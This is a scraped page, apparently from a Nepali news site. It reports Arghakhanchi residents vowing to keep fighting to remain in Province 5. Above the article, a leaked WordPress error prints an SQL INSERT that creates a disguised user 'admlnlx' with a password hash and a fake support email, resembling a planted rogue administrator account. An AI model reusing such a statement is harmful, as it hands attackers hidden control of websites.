WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZ07z2GVQRhb5Qt18hcfPfOw8G6ip71', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 04:21:43', '', 'admlnlx', 'admlnlx')
अर्घाखाँची,पुस ११ –
अर्घाखाँचीबासीले पाँच नम्बर प्रदेशबाट पहाडी जिल्ला छुट्याइए आफूहरुको संघर्षका कार्यक्रम जारी रहने र आवश्यक परे ज्यान समेत दिन तयार रहेको भन्दै शपथ लिएका छन् ।
आजको अन्नपूर्ण पोस्टमा खबर छ– गोरुसिंगे सन्धिखर्क सडकको स्याले बजारमा आइतबार सडकमा बसेर पाँच नम्बर प्रदेशको पक्षमा ज्यान रहेसम्म लडिरहने प्रतिबद्धतासहितको शपथ लिइएको संयुक्त संघर्ष समितिका संयोजक तथा नेपाली कांग्रेसका जिल्ला सभापति विष्णु मुस्कारले बताए ।